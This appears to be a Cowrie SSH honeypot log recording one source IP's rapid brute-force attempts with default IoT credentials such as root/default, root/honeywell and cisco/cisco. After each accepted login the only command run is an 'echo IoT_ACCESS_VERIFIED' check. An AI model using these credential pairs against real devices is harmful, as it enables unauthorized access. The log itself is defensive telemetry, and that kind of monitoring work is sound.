{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:27.486485Z","src_ip":"212.227.235.229","session":"feb013e7a1ae"}
{"eventid":"cowrie.login.success","username":"root","password":"default","message":"login attempt [root/default] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:26:29.576795Z","src_ip":"212.227.235.229","session":"feb013e7a1ae"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:26:30.100745Z","src_ip":"212.227.235.229","session":"feb013e7a1ae"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:26:30.101480Z","src_ip":"212.227.235.229","session":"feb013e7a1ae"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:30.421026Z","src_ip":"212.227.235.229","session":"feb013e7a1ae"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:30.422147Z","src_ip":"212.227.235.229","session":"feb013e7a1ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58910,"dst_ip":"1.2.3.4","dst_port":22,"session":"33f5ab65f298","protocol":"ssh","message":"New connection: 212.227.235.229:58910 (1.2.3.4:22) [session: 33f5ab65f298]","sensor":"my-vps","timestamp":"2025-08-26T08:26:30.555230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:30.841716Z","src_ip":"212.227.235.229","session":"33f5ab65f298"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:30.842821Z","src_ip":"212.227.235.229","session":"33f5ab65f298"}
{"eventid":"cowrie.login.failed","username":"admin","password":"default","message":"login attempt [admin/default] failed","sensor":"my-vps","timestamp":"2025-08-26T08:26:32.613157Z","src_ip":"212.227.235.229","session":"33f5ab65f298"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:34.868411Z","src_ip":"212.227.235.229","session":"33f5ab65f298"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50392,"dst_ip":"1.2.3.4","dst_port":22,"session":"0842c38c7fd1","protocol":"ssh","message":"New connection: 212.227.235.229:50392 (1.2.3.4:22) [session: 0842c38c7fd1]","sensor":"my-vps","timestamp":"2025-08-26T08:26:34.958460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:35.048867Z","src_ip":"212.227.235.229","session":"0842c38c7fd1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:35.149650Z","src_ip":"212.227.235.229","session":"0842c38c7fd1"}
{"eventid":"cowrie.login.success","username":"root","password":"honeywell","message":"login attempt [root/honeywell] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:26:36.388645Z","src_ip":"212.227.235.229","session":"0842c38c7fd1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:26:37.414334Z","src_ip":"212.227.235.229","session":"0842c38c7fd1"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:26:37.415052Z","src_ip":"212.227.235.229","session":"0842c38c7fd1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:38.018176Z","src_ip":"212.227.235.229","session":"0842c38c7fd1"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:38.019251Z","src_ip":"212.227.235.229","session":"0842c38c7fd1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35604,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5a0556a0623","protocol":"ssh","message":"New connection: 212.227.235.229:35604 (1.2.3.4:22) [session: e5a0556a0623]","sensor":"my-vps","timestamp":"2025-08-26T08:26:38.113253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:38.462440Z","src_ip":"212.227.235.229","session":"e5a0556a0623"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:38.463895Z","src_ip":"212.227.235.229","session":"e5a0556a0623"}
{"eventid":"cowrie.login.failed","username":"admin","password":"honeywell","message":"login attempt [admin/honeywell] failed","sensor":"my-vps","timestamp":"2025-08-26T08:26:41.078939Z","src_ip":"212.227.235.229","session":"e5a0556a0623"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:42.357594Z","src_ip":"212.227.235.229","session":"e5a0556a0623"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56706,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fdab7850ed1","protocol":"ssh","message":"New connection: 212.227.235.229:56706 (1.2.3.4:22) [session: 7fdab7850ed1]","sensor":"my-vps","timestamp":"2025-08-26T08:26:42.462963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:42.735683Z","src_ip":"212.227.235.229","session":"7fdab7850ed1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:42.736386Z","src_ip":"212.227.235.229","session":"7fdab7850ed1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T08:26:43.761329Z","src_ip":"212.227.235.229","session":"7fdab7850ed1"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:45.174775Z","src_ip":"212.227.235.229","session":"7fdab7850ed1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46838,"dst_ip":"1.2.3.4","dst_port":22,"session":"763d009e7130","protocol":"ssh","message":"New connection: 212.227.235.229:46838 (1.2.3.4:22) [session: 763d009e7130]","sensor":"my-vps","timestamp":"2025-08-26T08:26:45.300969Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:45.656525Z","src_ip":"212.227.235.229","session":"763d009e7130"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:45.657289Z","src_ip":"212.227.235.229","session":"763d009e7130"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco","message":"login attempt [cisco/cisco] failed","sensor":"my-vps","timestamp":"2025-08-26T08:26:47.409255Z","src_ip":"212.227.235.229","session":"763d009e7130"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:48.935570Z","src_ip":"212.227.235.229","session":"763d009e7130"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34858,"dst_ip":"1.2.3.4","dst_port":22,"session":"0acf93abdca6","protocol":"ssh","message":"New connection: 212.227.235.229:34858 (1.2.3.4:22) [session: 0acf93abdca6]","sensor":"my-vps","timestamp":"2025-08-26T08:26:49.046574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:49.551188Z","src_ip":"212.227.235.229","session":"0acf93abdca6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:49.551851Z","src_ip":"212.227.235.229","session":"0acf93abdca6"}
{"eventid":"cowrie.login.success","username":"root","password":"rootpass","message":"login attempt [root/rootpass] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:26:51.874805Z","src_ip":"212.227.235.229","session":"0acf93abdca6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:26:52.802162Z","src_ip":"212.227.235.229","session":"0acf93abdca6"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-26T08:26:52.802847Z","src_ip":"212.227.235.229","session":"0acf93abdca6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:53.278240Z","src_ip":"212.227.235.229","session":"0acf93abdca6"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:53.279794Z","src_ip":"212.227.235.229","session":"0acf93abdca6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52100,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e01af902ab8","protocol":"ssh","message":"New connection: 212.227.235.229:52100 (1.2.3.4:22) [session: 2e01af902ab8]","sensor":"my-vps","timestamp":"2025-08-26T08:26:53.422400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:53.810390Z","src_ip":"212.227.235.229","session":"2e01af902ab8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:53.811535Z","src_ip":"212.227.235.229","session":"2e01af902ab8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1111","message":"login attempt [admin/1111] failed","sensor":"my-vps","timestamp":"2025-08-26T08:26:56.208729Z","src_ip":"212.227.235.229","session":"2e01af902ab8"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:26:57.713414Z","src_ip":"212.227.235.229","session":"2e01af902ab8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43100,"dst_ip":"1.2.3.4","dst_port":22,"session":"2921f56de9a3","protocol":"ssh","message":"New connection: 212.227.235.229:43100 (1.2.3.4:22) [session: 2921f56de9a3]","sensor":"my-vps","timestamp":"2025-08-26T08:26:57.808493Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:26:58.372652Z","src_ip":"212.227.235.229","session":"2921f56de9a3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:26:58.379371Z","src_ip":"212.227.235.229","session":"2921f56de9a3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0000","message":"login attempt [admin/0000] failed","sensor":"my-vps","timestamp":"2025-08-26T08:27:00.831621Z","src_ip":"212.227.235.229","session":"2921f56de9a3"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:27:02.104904Z","src_ip":"212.227.235.229","session":"2921f56de9a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34840,"dst_ip":"1.2.3.4","dst_port":22,"session":"edb4d7550505","protocol":"ssh","message":"New connection: 212.227.235.229:34840 (1.2.3.4:22) [session: edb4d7550505]","sensor":"my-vps","timestamp":"2025-08-26T08:27:02.226848Z"}
